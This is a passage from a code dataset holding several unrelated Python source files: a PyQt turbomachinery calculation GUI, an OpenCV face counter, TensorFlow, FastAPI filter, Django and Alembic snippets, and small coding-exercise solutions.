self.cobj.subcomponentList:\n this = QtGui.QTreeWidgetItem()\n this.setText(0, elem[1].identification)\n this.setText(1, str(elem[1]))\n subTreeItems.append(this)\n masterTreeItem.addChild(this)\n\n self.tree.addTopLevelItem(masterTreeItem)\n self.tree.setColumnWidth(0, 250)\n self.tree.setColumnWidth(1, 400)\n self.tree.expandAll()\n\n ## initialize component stack\n #\n # build the component stack based on the current cobj\n # the current component (cobj) will correspond to the first widget,\n # thereafter a widget for each corresponding sub-component (if present) is appended\n #\n # each widget contains the necessary tables for the corresponding (sub-)component\n def initIOList(self):\n # note: ordering of widgets (components) is important here!\n del self.tableList[:]\n\n self.ioWidgetStack = QtGui.QStackedWidget()\n\n # add widget for parent component to widget stack\n self.ioWidgetStack.addWidget(self.getParamIOWidget(self.cobj))\n\n # add widgets for sub-components to widget stack\n for elem in self.cobj.subcomponentList:\n self.ioWidgetStack.addWidget(self.getParamIOWidget(elem[1]))\n\n # update all tables\n self.updateTables()\n\n ## action for selecting a new component in the structure tree\n #\n # this function is called whenever the user selects a new (sub-)component in the structure tree\n # in consequence, the corresponding widget in the widget stack is selected and sent forward\n def getActiveWidget(self):\n\n # try to grab tab index if the current widget on the stack is a QTabWidget\n if isinstance(self.ioWidgetStack.currentWidget(), QtGui.QTabWidget):\n tab_index = self.ioWidgetStack.currentWidget().currentIndex()\n else:\n tab_index = -1\n\n # retrieve current selection and update the index of the widget stack\n self.ioWidgetStack.setCurrentIndex(self.getActiveObj()[0])\n\n # apply the tab index if both the old and the new widget on the stack are QTabWidgets\n if (tab_index >= 0) and (isinstance(self.ioWidgetStack.currentWidget(), QtGui.QTabWidget)):\n self.ioWidgetStack.currentWidget().setCurrentIndex(tab_index)\n\n ## retrieve the currently with the structure tree selected (sub-)component\n #\n # @return\n #\tan array describing the selected (sub-)component: [0] - index of selected component, [1] - reference to instance of selected component\n #\n def getActiveObj(self):\n\n # get selection of QTreeWidget\n try:\n # try to match the label of the selected component to the list of available components\n label = self.tree.selectedItems()[0].text(0)\n\n if label == self.cobj.identification:\n activeobj = self.cobj\n return [0, activeobj]\n\n for n in range(len(self.cobj.subcomponentList)):\n if label == self.cobj.subcomponentList[n][1].identification:\n activeobj = self.cobj.subcomponentList[n][1]\n return [n + 1, activeobj]\n\n except IndexError:\n return None\n\n ## export the selected component to a new tab\n #\n # this function is called whenever the user click the buttons \"export component\"\n # it retrieves the currently selected component and copies it into a new tab\n def exportSelected(self):\n\n # make a deep copy of selected component\n obj = copy.copy(self.getActiveObj()[1])\n\n if obj == None:\n QtGui.QMessageBox.information(self, \"Error\",\n \"Could not retrieve the currently selected component.\")\n return\n\n # make another deep copy\n # to retrieve and copy the parameter constraints imposed by the parent\n tmp = copy.copy(obj)\n tmp.__init__(\"tmp\")\n obj.thermoInputParams = tmp.thermoInputParams\n obj.thermoOutputParams = tmp.thermoOutputParams\n 
obj.aeroInputParams = tmp.aeroInputParams\n obj.aeroOutputParams = tmp.aeroOutputParams\n del tmp\n\n # create a new tab based on the generated copy\n self.parent.mainWidget.addTab(GUIcalcIO(obj, self.parent), obj.identification)\n\n ## build the io widget for a (sub-)component\n #\n # @param elem\n #\tcomponent of type AbstractTurbo\n def getParamIOWidget(self, elem):\n\n # thermodynamical GUI\n thermowidget = QtGui.QWidget()\n hboxThermo = QtGui.QHBoxLayout()\n vboxThermo = QtGui.QVBoxLayout()\n vboxThermo.addLayout(hboxThermo)\n thermowidget.setLayout(vboxThermo)\n scrollThermo = QtGui.QScrollArea()\n scrollThermo.setWidget(thermowidget)\n\n # aerodynamical GUI\n aerowidget = QtGui.QWidget()\n hboxAero = QtGui.QHBoxLayout()\n scrollAero = QtGui.QScrollArea()\n vboxAero = QtGui.QVBoxLayout()\n vboxAero.addLayout(hboxAero)\n aerowidget.setLayout(vboxAero)\n scrollAero.setWidget(aerowidget)\n\n # initialize tables for this component\n iotlist = []\n for i in range(4):\n table = QtGui.QTableWidget(self)\n\n table.setColumnCount(1)\n table.horizontalHeader().setStretchLastSection(True)\n iotlist.append(table)\n # connect the cellChanged action\n self.connect(table, QtCore.SIGNAL(\"cellChanged(int,int)\"), self.tableItemChanged)\n\n self.tableList.append(iotlist)\n\n # populate the widget with the tables\n hboxThermo.addWidget(self.tableList[-1][0])\n hboxThermo.addWidget(self.tableList[-1][1])\n\n hboxAero.addWidget(self.tableList[-1][2])\n hboxAero.addWidget(self.tableList[-1][3])\n\n # add tabs\n widget = QtGui.QTabWidget()\n widget.addTab(thermowidget, \"Thermo\")\n widget.addTab(aerowidget, \"Aero\")\n\n # execute custom modular subfunction connected to the component\n for i in elem.modularSubfunctionList:\n i(widget)\n\n return widget\n\n ## slot for changed table data\n #\n # this function is called whenever data in one of the tables is modified\n # this will reset the thermoDone and aeroDone status indicators\n def tableItemChanged(self, item_):\n self.thermoDone = False\n self.aeroDone = False\n\n self.calcAeroButton.setEnabled(0)\n\n ## populate a dictionary with data taken from tables\n #\n # @param table_\n #\teither a single table (QTableWidget) or a list of QTableWidgets to fetch the data from\n # @return\n #\ta dictionary containing key,values-pairs of the data within table_\n def getDictFromTable(self, table_):\n\n # target dictionary\n paramdict = {}\n\n try:\n # loop over all tables\n for i in range(len(table_)):\n\n # loop over all rows\n for n in range(table_[i].rowCount()):\n paramdict[str(table_[i].verticalHeaderItem(n).text())] = \\\n self.getInternalValueType(table_[i].item(n, 0).text())\n except TypeError:\n # loop over all rows\n for n in range(table_.rowCount()):\n paramdict[str(table_.verticalHeaderItem(n).text())] = \\\n self.getInternalValueType(table_.item(n, 0).text())\n\n return paramdict\n\n ## populate a table with data taken from a dictionary\n #\n # @todo Documentation!\n def getTableFromDict(self, dict_, table_):\n for i in range(len(table_)):\n for k in range(table_[i].rowCount()):\n for l, m in dict_.iteritems():\n if str(table_[i].verticalHeaderItem(k).text()) == l:\n table_[i].item(k, 0).setText(m)\n\n def getInternalValueType(self, qstring):\n try:\n if str(qstring) == \"None\":\n return None\n else:\n return float(qstring)\n except ValueError:\n return str(qstring)\n\n ## update all tables to reflect the current values stored within the component instances\n #\n # this will reset all tables for all (sub-)components of the current engine,\n # even the ones not 
shown (all entries of the widget stack)\n def updateTables(self):\n\n ## create item for vertical header\n def headerItem(caption_, tooltip_):\n item = QtGui.QTableWidgetItem()\n item.setText(str(caption_))\n item.setToolTip(str(tooltip_))\n\n return item\n\n ## create item for value item\n def valueItem(value_, tooltip_):\n if isinstance(value_, list) and len(value_) == 1:\n value_ = value_[0]\n print(\"WARNING: converted atomic list for \" + tooltip_ + \" to string.\")\n\n item = QtGui.QTableWidgetItem()\n item.setText(str(value_))\n item.setToolTip(str(tooltip_))\n\n return item\n\n ## create item for unit item\n def unitItem(unit_, tooltip_):\n item = QtGui.QTableWidgetItem()\n item.setText(\"[\" + str(unit_) + \"]\")\n item.setToolTip(str(tooltip_))\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n\n return item\n\n # loop over all tables\n for n in range(len(self.tableList)):\n\n # get object associated to the table\n if n == 0:\n obj = self.cobj\n else:\n obj = self.cobj.subcomponentList[n - 1][1]\n\n # storage for all data to be printed\n dictlist = [obj.getThermoInputDict(),\n obj.getThermoOutputDict(),\n obj.getAeroInputDict(),\n obj.getAeroOutputDict()]\n\n # write data into tables\n for index, table in enumerate(self.tableList[n][:]):\n dict_ = dictlist[index]\n table.setRowCount(len(dict_.keys()))\n table.setColumnCount(2)\n labels = []\n for index, item in enumerate(dict_):\n table.setVerticalHeaderItem(index, headerItem(item, dict_[item][2]))\n table.setItem(index, 0, valueItem(dict_[item][0], dict_[item][2]))\n table.setItem(index, 1, unitItem(dict_[item][1], dict_[item][2]))\n table.setVerticalHeaderLabels(labels)\n table.setHorizontalHeaderLabels([\"Value\", \"Unit\"])\n table.horizontalHeader().setMinimumSectionSize(50)\n table.horizontalHeader().resizeSection(0, 200)\n table.horizontalHeader().setDefaultAlignment(QtCore.Qt.AlignHCenter)\n table.verticalHeader().setResizeMode(QtGui.QHeaderView.Fixed)\n\n ## update the input values for all (sub-)components\n #\n # copy the data entered into the input tables to all (sub-)components\n def writeInputToObject(self):\n\n # copy the data for the parent component\n self.cobj.setVariablesFromDict(self.getDictFromTable(self.tableList[0]))\n\n # copy the data for all sub-components\n for i in range(len(self.cobj.subcomponentList)):\n self.cobj.subcomponentList[i][1].setVariablesFromDict(self.getDictFromTable(self.tableList[i + 1]))\n\n ## launch calculation of thermodynamics\n def calcThermodynamics(self):\n try:\n self.writeInputToObject()\n self.cobj.calcThermo()\n self.updateTables()\n except Exception as e:\n # print sys.exc_info()\n self.calcErr.showMessage(str(sys.exc_info()[1]))\n logger.error(e)\n else:\n self.calcAeroButton.setEnabled(1)\n self.thermoDone = True\n\n ## launch calculation of aerodynamics\n def calcAerodynamics(self):\n try:\n self.writeInputToObject()\n self.cobj.calcAero()\n self.updateTables()\n except Exception as e:\n self.calcErr.showMessage(str(sys.exc_info()[1]))\n logger.error(e)\n else:\n self.aeroDone = True\n","repo_name":"RoyLemue/gtdev","sub_path":"gtdev/gui/GUIcalcIO.py","file_name":"GUIcalcIO.py","file_ext":"py","file_size_in_byte":16154,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"29178391358","text":"#imagens/px-people.jpg\r\n#haarcascade_frontalface_default.xml\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as 
plt\r\n\r\nimagem=cv2.imread(\"px-people.jpg\")\r\nimagem=cv2.cvtColor(imagem,cv2.COLOR_BGR2RGB)\r\n\r\n#Converting the image to grayscale\r\n\r\nimagem_cinza=cv2.cvtColor(imagem,cv2.COLOR_RGB2GRAY)\r\n\r\n#Creating the classifier\r\n\r\nclassificador=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n#Counting the number of faces in the image\r\n\r\nfaces=classificador.detectMultiScale(imagem_cinza,1.3,5)\r\n\r\nprint(\"Number of faces in the image:\",len(faces))\r\n\r\n#Drawing rectangles on the faces\r\n\r\nimagem_copy=imagem.copy()\r\n\r\nfor (x,y,w,h) in faces:\r\n\r\n cv2.rectangle(imagem_copy,(x,y),(x+w,y+h),(255,255,0),2)\r\n\r\nplt.imshow(imagem_copy)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"KelvimImperial/detectando_fotos","sub_path":"reconhecimento De Rostos.py","file_name":"reconhecimento De Rostos.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"12834018681","text":"import sys\nsys.path.append( \"../../util\" )\n\nfrom networkcomponents import *\nfrom db_meta import *\nfrom multiple_pointer_custom import *\n\n# INPUT:\n# start_context: BS X N X D1\n# t_col_encoded: BS X T X D2.\n# Output:\n# 1. Columns of the VU units. BS X N X T\n# 2. Context Mask: Actual # of used contexts. BS\n# 3. Operator raw scores of the VU unit. BS X N X Len( OP )\n# 4. Distinct raw scores of the VU unit. BS X N X 2\ndef generate_multiple_vu( start_context, context_mask, t_col_encoded, t_col_mask, iter_num, scope, regularizer, do_agg_tot = False ):\n with tf.variable_scope( scope, reuse = tf.AUTO_REUSE ):\n start_context = apply_mask( start_context, context_mask, float( 0.0 ) )\n start_context = layer_norm( start_context, context_mask, scope = \"c_ln\" )\n mc1, p1 = get_pointer_N( start_context, t_col_encoded, t_col_mask, regularizer, scope = \"PTR1\", dim_scale = 2 )\n mc1 = apply_mask( mc1, context_mask, float( 0.0 ) )\n mc1 = layer_norm( mc1, context_mask, scope = \"m1_ln\" )\n\n # Get Other Scores.\n agg1 = tf.layers.dense( mc1, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_proj\", kernel_regularizer = regularizer )\n dist1 = tf.layers.dense( mc1, 2, kernel_initializer = variable_initializer, name = \"dist_proj\", kernel_regularizer = regularizer )\n op = tf.layers.dense( mc1, len( VEC_OPERATORS ), kernel_initializer = variable_initializer, name = \"oper_proj\", kernel_regularizer = regularizer )\n aggt = tf.layers.dense( mc1, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_tot_proj\", kernel_regularizer = regularizer )\n\n # Get Col Ptr 2.\n mc2, p2 = get_pointer_N( mc1, t_col_encoded, t_col_mask, regularizer, scope = \"PTR2\", dim_scale = 2 )\n mc2 = apply_mask( mc2, context_mask, float( 0.0 ) )\n mc2 = layer_norm( mc2, context_mask, scope = \"m2_ln\" )\n\n # Get Other scores.\n agg2 = tf.layers.dense( mc2, len( VEC_AGGREGATORS ), kernel_initializer = variable_initializer, name = \"agg_proj\", kernel_regularizer = regularizer )\n dist2 = tf.layers.dense( mc2, 2, kernel_initializer = variable_initializer, name = \"dist_proj\", kernel_regularizer = regularizer )\n \n if do_agg_tot:\n return mc1, mc2, p1, p2, agg1, agg2, dist1, dist2, op, aggt\n\n return mc1, mc2, p1, p2, agg1, agg2, dist1, dist2, op \n 
\n","repo_name":"kakaoenterprise/RYANSQL","sub_path":"src/valueunit_gen_network.py","file_name":"valueunit_gen_network.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"68"} +{"seq_id":"73951422616","text":"import operator\nfrom typing import Any, Callable, Optional\n\nfrom core.database.base import Base\nfrom fastapi import HTTPException\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import InstrumentedAttribute\nfrom sqlalchemy.sql import Select\n\n__all__ = ['BaseFilter', 'IntegerFilter', 'CharFilter', 'like', 'ilike', 'contains', 'icontains']\n\n\ndef like(model_field: InstrumentedAttribute, value: Any):\n return model_field.like(value)\n\n\ndef ilike(model_field: InstrumentedAttribute, value: Any):\n return model_field.ilike(value)\n\n\ndef contains(model_field: InstrumentedAttribute, value: Any):\n return model_field.contains(value)\n\n\ndef icontains(model_field: InstrumentedAttribute, value: Any):\n return func.lower(model_field).contains(func.lower(value))\n\n\nLOOKUP_EXPR_MAPPER: dict[str, Callable] = {\n '==': operator.eq,\n '>': operator.gt,\n '>=': operator.ge,\n '<': operator.lt,\n '<=': operator.le,\n 'like': like,\n 'ilike': ilike,\n 'contains': contains,\n 'icontains': icontains,\n}\n\n\nclass BaseFilter:\n def __init__(\n self,\n model_class: Optional[Base] = None,\n field_name: Optional[str] = None,\n lookup_expr: str = '==',\n method_name: Optional[str] = None,\n ):\n self.name = ''\n self.model_class = model_class\n self.field_name = field_name\n self.lookup_expr = LOOKUP_EXPR_MAPPER.get(lookup_expr)\n self.method_name = method_name\n\n def filter(self, db_query: Select, value: str) -> Select:\n value = self.validate_value(value)\n return db_query.where(self.lookup_expr(getattr(self.model_class, self.field_name), value))\n\n def validate_value(self, value: str) -> str:\n return value\n\n\nclass IntegerFilter(BaseFilter):\n def validate_value(self, value: str) -> int:\n return int(value)\n\n\nclass CharFilter(BaseFilter):\n def __init__(\n self,\n model_class: Optional[Base] = None,\n field_name: Optional[str] = None,\n lookup_expr: str = '==',\n method_name: Optional[str] = None,\n min_length: Optional[int] = None,\n max_length: Optional[int] = None,\n ):\n super().__init__(\n model_class=model_class,\n field_name=field_name,\n lookup_expr=lookup_expr,\n method_name=method_name,\n )\n self.min_length = min_length\n self.max_length = max_length\n\n def validate_value(self, value: str) -> str:\n value_length = len(value)\n if self.min_length and value_length < self.min_length:\n raise HTTPException(status_code=400, detail=f'{self.name} value is too short')\n if self.max_length and value_length > self.max_length:\n raise HTTPException(status_code=400, detail=f'{self.name} value is too long')\n return value\n","repo_name":"Fagtoy/bgram","sub_path":"project/core/filters/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40680629610","text":"from django.db.models import Exists, OuterRef\n\nfrom utils.management.base import TournamentCommand\n\nfrom ...models import BallotSubmission, SpeakerScoreByAdj\n\n\nclass Command(TournamentCommand):\n\n help = \"Removes all blank ballot submissions, i.e. 
ones without adjudicator speaker scores attached.\"\n\n def add_arguments(self, parser):\n super(Command, self).add_arguments(parser)\n parser.add_argument(\"--dry-run\", action=\"store_true\", help=\"Show what it would delete, but do not actually delete\")\n\n def handle_tournament(self, tournament, **options):\n qs = BallotSubmission.objects.filter(debate__round__tournament=tournament).exclude(\n Exists(SpeakerScoreByAdj.objects.filter(ballot_submission=OuterRef('pk'))))\n for bsub in qs:\n if not options[\"dry_run\"]:\n self.stdout.write(\"Deleting {:s}\".format(str(bsub)))\n else:\n self.stdout.write(\"Would delete {:s}\".format(str(bsub)))\n if not options[\"dry_run\"]:\n qs.delete()\n","repo_name":"TabbycatDebate/tabbycat","sub_path":"tabbycat/results/management/commands/removeblankballots.py","file_name":"removeblankballots.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"68"} +{"seq_id":"33553953425","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom load_graph import load_graph,dict2graph\nfrom plot_graph import plot_graph\nimport os,argparse,glob,json\n\ndef sample_graphs(num_nodes, num_graphs, graph_dir, seed=111):\n\tif os.path.isdir(graph_dir):\n\t\tgraphs = [load_graph(path)\n\t\t\t\t\tfor path in glob.glob(os.path.join(graph_dir,'*.json'))]\n\telse:\n\t\tos.makedirs(graph_dir)\n\t\tgraphs = []\n\texcluded_graph_dir = os.path.join(graph_dir, 'exclude')\n\tif os.path.isdir(excluded_graph_dir):\n\t\texcluded_graphs = [load_graph(path)\n\t\t\t\t\t\t\t\tfor path in glob.glob(os.path.join(excluded_graph_dir,'*.json'))]\n\telse:\n\t\texcluded_graphs = []\n\tnum_excluded_graphs = len(excluded_graphs)\n\tgraphs += excluded_graphs\n\n\tprev_studied_dir = os.path.join(graph_dir, 'previously_studied')\n\tif os.path.isdir(prev_studied_dir):\n\t\tprev_studied_graphs = {os.path.basename(os.path.splitext(path)[0]):load_graph(path)\n\t\t\t\t\t\t\t\tfor path in glob.glob(os.path.join(prev_studied_dir,'*.json'))}\n\telse:\n\t\tprev_studied_graphs = dict()\n\n\trandom_state = np.random.RandomState(seed)\n\tduplications = []\n\tfor graph_ix in range(num_graphs):\n\t\twhile True:\n\t\t\tordered_nodes,node2parents,g = generate_directed_acyclic_graph(num_nodes,random_state=random_state)\n\t\t\toverlap = False\n\t\t\tfor g_prev in graphs:\n\t\t\t\tif nx.algorithms.isomorphism.is_isomorphic(g,g_prev):\n\t\t\t\t\toverlap = True\n\t\t\t\t\tbreak\n\t\t\tif not overlap:\n\t\t\t\tbreak\n\t\tgraphs.append(g)\n\n\t\tisomorphic_name = None\n\t\tfor name_prev,prev_g in prev_studied_graphs.items():\n\t\t\tif nx.algorithms.isomorphism.is_isomorphic(g,prev_g):\n\t\t\t\tisomorphic_name = name_prev\n\t\t\t\tbreak\n\n\t\tbasename_wo_ext = '{:02d}'.format(len(graphs)-num_excluded_graphs-1)\n\t\tif not isomorphic_name is None:\n\t\t\tduplications.append((basename_wo_ext,isomorphic_name))\n\t\tsave_path_wo_ext = os.path.join(graph_dir,basename_wo_ext)\n\t\twith open(save_path_wo_ext + '.json', 'w') as f:\n\t\t\tjson.dump({'ordered_nodes':ordered_nodes,'node2parents':node2parents}, f)\n\t\tplot_graph(g, save_path_wo_ext + '.png')\n\n\tif duplications:\n\t\tdf = pd.DataFrame(duplications,columns=['sampled_graph','previous_graph'])\n\t\tsave_path = os.path.join(graph_dir, 'duplications.csv')\n\t\tif os.path.isfile(save_path):\n\t\t\tdf.to_csv(save_path, index=False, mode='a',header=False)\n\t\telse:\n\t\t\tdf.to_csv(save_path, index=False)\n\n\ndef 
generate_directed_acyclic_graph(num_nodes, random_state=None):\n\tif random_state is None:\n\t\trandom_state = np.random.RandomState()\n\twhile True:\n\t\tnode2parents = dict()\n\t\tordered_nodes = []\n\t\tfor node_ix in range(num_nodes):\n\t\t\tparents = [node for node in node2parents.keys() if random_state.rand()>0.5]\n\t\t\tnode_name = 'node_{}'.format(node_ix)\n\t\t\tnode2parents[node_name] = parents\n\t\t\tordered_nodes.append(node_name)\n\t\tg = dict2graph(node2parents)\n\t\tif (not nx.algorithms.isolate.number_of_isolates(g)) and (max(map(len,node2parents.values()))>1): # Reject if any node is isolated (no incoming nor outgoing neighbors).\n\t\t\tbreak\n\treturn ordered_nodes,node2parents,g\n\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('save_dir', type=str, help='Path to the directory where sampled graphs are saved.')\n\tparser.add_argument('num_graphs', type=int, help='# of graphs to sample.')\n\tparser.add_argument('--num_nodes', type=int, default=5, help='# of nodes in the sampled graphs.')\n\tparser.add_argument('--seed', type=int, default=111, help='Random seed.')\n\targs = parser.parse_args()\n\t\t\n\tsample_graphs(args.num_nodes, args.num_graphs, args.save_dir, seed=args.seed)","repo_name":"tkc-morita/attention-based_analysis_of_animal_relations","sub_path":"simulation/generate_graphs_multiple_parents.py","file_name":"generate_graphs_multiple_parents.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12793668732","text":"class DashController:\n def __init__(self, sale_model, inventory_model, purchase_model, udaro_model, view):\n self.sale_model = sale_model\n self.inventory_model = inventory_model\n self.purchase_model = purchase_model\n self.udaro_model = udaro_model\n self.view = view\n\n def sales_view(self):\n cols = self.sale_model.get_colnames()\n data = self.sale_model.get_allsales()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 0\n\n\n\n def inventory_view(self):\n cols = self.inventory_model.get_colnames()\n data = self.inventory_model.get_allproducts()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 1\n\n\n def purchase_view(self):\n cols = self.purchase_model.get_colnames()\n data = self.purchase_model.get_allpurchases()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 2\n\n\n def udharo_view(self):\n cols = self.udaro_model.get_colnames()\n data = self.udaro_model.get_alludaro()\n self.view.create_treeview(cols, data)\n self.view.view_flag = 3\n\n\n def perform_update(self, cols, values, table):\n \n if table == 0:\n # which means sales table\n self.sale_model.update_by_date(values)\n self.sales_view()\n elif table == 1:\n # which means inventory table\n self.inventory_model.update_by_name(values)\n self.inventory_view()\n elif table == 2:\n # purchase table\n self.purchase_model.update_by_date(values)\n \n self.purchase_view()\n\n elif table == 3:\n self.udaro_model.update_by_date(values)\n \n self.udharo_view()\n else:\n print(\"error\")\n print(cols, values, table)\n\n\n\n def delete_record(self, record, table):\n if table == 0:\n # which means sales table\n self.sale_model.delete_by_date(record[0])\n self.sales_view()\n elif table == 1:\n # which means inventory table\n self.inventory_model.delete_by_name(record[0])\n self.inventory_view()\n elif table == 2:\n # purchase table\n a = self.purchase_model.delete_by_date(record[0])\n if a:\n 
self.inventory_model.update_deleted(record[1], float(record[2])*float(record[3]))\n self.purchase_view()\n\n elif table == 3:\n self.udaro_model.delete_by_date(record[0])\n self.udharo_view()\n else:\n print(\"error\")\n","repo_name":"Manjil-Karki/pos","sub_path":"controllers/dash.py","file_name":"dash.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35488905395","text":"from django.contrib import admin\n\nfrom .models import ManagementCommand\n\n\nclass ManagementCommandAdmin(admin.ModelAdmin):\n list_display = ['command', 'args', 'created_on', 'status', 'output']\n\n def get_form(self, request, obj=None, **kwargs):\n self.exclude = ['created_on', 'status', 'output']\n return super(ManagementCommandAdmin, self).get_form(request, obj, **kwargs)\n\n\nadmin.site.register(ManagementCommand, ManagementCommandAdmin)\n","repo_name":"ShahidTariq/DjangoRunCommands","sub_path":"django_run_command/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"72567359575","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os, re\nfrom copy import deepcopy\nimport numpy as np\nfrom tensorboard.backend.event_processing import event_accumulator\nsns.set()\n\n# # load the log data\ndef smooth(datalist, weight:float=0.25, block:int = 500):\n new_datalist = []\n for item in datalist:\n new_datalist.append(deepcopy(weight * np.mean(datalist[max(datalist.index(item)-block, 0): datalist.index(item)]) + item*(1-weight)))\n return new_datalist\n\ndef main(dirpath:str='./runs/'):\n event_dir = dirpath\n df = pd.DataFrame()\n all_dir = os.listdir(event_dir)\n all_dir.sort()\n for file in all_dir:\n temp_df = pd.DataFrame()\n subdir = event_dir+file + '/'\n type = re.search(r'_[a-zA-Z]{2,4}\\d{0,2}', subdir).group(0)[1:]\n ea_name = [item for item in os.listdir(subdir) if re.match(r'events*', item) is not None][0]\n ea=event_accumulator.EventAccumulator(subdir + ea_name).Reload().scalars\n key_dir = ea.Keys()\n temp_df['step'] = [item.step for item in ea.Items(key_dir[0])]\n for key in key_dir[:8]:\n temp_df[key] = [item.value for item in ea.Items(key)]\n temp_df['method'] = type\n temp_df['Number of edge devices'] = ea.Items(key_dir[-1])[0].value\n df = pd.concat([df, temp_df])\n #save file\n df.to_csv('./data/saved.csv')\nmain()","repo_name":"XiaoWangya/protocol_learning_with_MADRL","sub_path":"data_save.py","file_name":"data_save.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"40693466289","text":"import re\nclass Bob(object):\n\tdef __init__(self):\n\t\tpass\n\tdef hey(self,string):\n\n\t\tallUpper = re.compile(r'^[A-Z\\d\\s]+$')\n\t\tdigitAndPunc = re.compile(r'^[\\d]+$')\n\t\tif string.strip() == \"\":\n\t\t\treturn \"Fine. 
Be that way!\"\n\n\t\telif digitAndPunc.match(''.join(e for e in string if e.isalnum())):\n\t\t\tif string[-1] == \"?\":\n\t\t\t\treturn \"Sure.\"\n\t\t\telse:\n\t\t\t\treturn \"Whatever.\"\n\n\t\telif allUpper.match(''.join(e for e in string if e.isalnum())) or string.upper() == string:\n\t\t\treturn 'Woah, chill out!'\n\n\t\telif string[-1] == \"?\":\n\t\t\treturn \"Sure.\"\n\n\t\telse:\n\t\t\treturn \"Whatever.\"\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/147eb7777fbf48359b771b8db0ce054f.py","file_name":"147eb7777fbf48359b771b8db0ce054f.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"22594194152","text":"class Solution:\n def letterCasePermutation(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n ans = [[]]\n\n for char in S:\n n = len(ans)\n\n if char.isalpha():\n for i in range(n):\n ans.append(ans[i][:])\n ans[i].append(char.lower())\n ans[n+i].append(char.upper())\n else:\n for i in range(n):\n ans[i].append(char)\n\n\n ans2 = []\n for i in range(len(ans)):\n ans2.append(\"\".join(ans[i]))\n\n return ans2\n\n def letterCasePermutation2(self, S):\n\n ans = [\"\"]\n\n for char in S:\n if char.isalpha():\n for i in range(len(ans)):\n ans.append(ans[i]+char.upper())\n ans[i] += char.lower()\n else:\n for i in range(len(ans)):\n ans[i] +=char\n return ans\n\n","repo_name":"yukiii-zhong/Leetcode","sub_path":"Array/src/784. Letter Case Permutation.py","file_name":"784. Letter Case Permutation.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12656354867","text":"\"\"\"Initial Migration\n\nRevision ID: 687b57a0f5e9\nRevises: 2397abc31fe8\nCreate Date: 2021-08-17 17:21:46.123521\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '687b57a0f5e9'\ndown_revision = '2397abc31fe8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('pitches',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=255), nullable=False),\n sa.Column('post', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('pitch_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('downvotes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('upvotes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pitch_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pitch_id'], ['pitches.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_column('users', 'secure_password')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n 